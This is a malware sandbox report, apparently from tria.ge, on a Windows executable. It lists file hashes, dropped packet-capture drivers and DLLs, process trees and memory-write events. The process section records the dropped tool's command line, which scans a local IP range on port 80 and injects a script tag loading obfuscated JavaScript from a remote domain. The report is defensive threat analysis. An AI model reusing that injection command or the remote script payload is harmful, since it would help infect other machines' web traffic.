Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29/12/2023, 20:30
Static task
static1
Behavioral task
behavioral1
Sample
032d7cb609f83f27964560bebfc37a04.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
032d7cb609f83f27964560bebfc37a04.exe
Resource
win10v2004-20231215-en
General
-
Target
032d7cb609f83f27964560bebfc37a04.exe
-
Size
525KB
-
MD5
032d7cb609f83f27964560bebfc37a04
-
SHA1
c8aa87b6ba9d7d5432b6426b94d148e46b9073ac
-
SHA256
30b6789a6a49c7b5a82d2c2ddf52d1c77ce50ce0b8b2568d4edde594e5d4652e
-
SHA512
c8314ea1ee32dac8a2cd954792b1d69e0f4af7f8d98949544bbcba96685870045c51db2de81e05f7ceea1210f963a5ae87f5132df394003dc4231e75319e6e0f
-
SSDEEP
6144:wM8MSbxohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QOPoS:wHNx2E9/cZw/X6eSPtfS6G6aPoS
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 032d7cb609f83f27964560bebfc37a04.exe -
Executes dropped EXE 1 IoCs
pid Process 3244 360uawm.exe -
Loads dropped DLL 6 IoCs
pid Process 3244 360uawm.exe 3244 360uawm.exe 3244 360uawm.exe 3244 360uawm.exe 3244 360uawm.exe 3244 360uawm.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\360uawm.exe 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\npptools.dll 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\Packet.dll 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\WanPacket.dll 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\wpcap.dll 032d7cb609f83f27964560bebfc37a04.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings 032d7cb609f83f27964560bebfc37a04.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3824 PING.EXE -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 644 Process not Found 644 Process not Found 644 Process not Found 644 Process not Found 644 Process not Found -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 456 wrote to memory of 3244 456 032d7cb609f83f27964560bebfc37a04.exe 103 PID 456 wrote to memory of 3244 456 032d7cb609f83f27964560bebfc37a04.exe 103 PID 456 wrote to memory of 3244 456 032d7cb609f83f27964560bebfc37a04.exe 103 PID 456 wrote to memory of 1688 456 032d7cb609f83f27964560bebfc37a04.exe 117 PID 456 wrote to memory of 1688 456 032d7cb609f83f27964560bebfc37a04.exe 117 PID 456 wrote to memory of 1688 456 032d7cb609f83f27964560bebfc37a04.exe 117 PID 1688 wrote to memory of 3824 1688 backgroundTaskHost.exe 107 PID 1688 wrote to memory of 3824 1688 backgroundTaskHost.exe 107 PID 1688 wrote to memory of 3824 1688 backgroundTaskHost.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\032d7cb609f83f27964560bebfc37a04.exe"C:\Users\Admin\AppData\Local\Temp\032d7cb609f83f27964560bebfc37a04.exe"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\SysWOW64\360uawm.exe-idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%64a.P%61ss%69ngG%61s.n%65t/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 12.bat2⤵PID:1688
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2952
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:3824
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
- Suspicious use of WriteProcessMemory
PID:1688
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
381KB
MD57f9b2d7a3bfed5131ea5c00ee7901078
SHA191138d690868c7c6129ed9cbf931d024e3862a56
SHA256007859f01620750403d081a52841c89fec3e9c0c4138bd16301f8e197ff00ba8
SHA512fc11856deb1300c8bc6c0cfd6306856d11c4ee61bcf6afd9aee62b90b5a92cd84f920b034b21c778ae991c7a00f6f27035e8e8a0d7853caf55056cb7ec4f1e05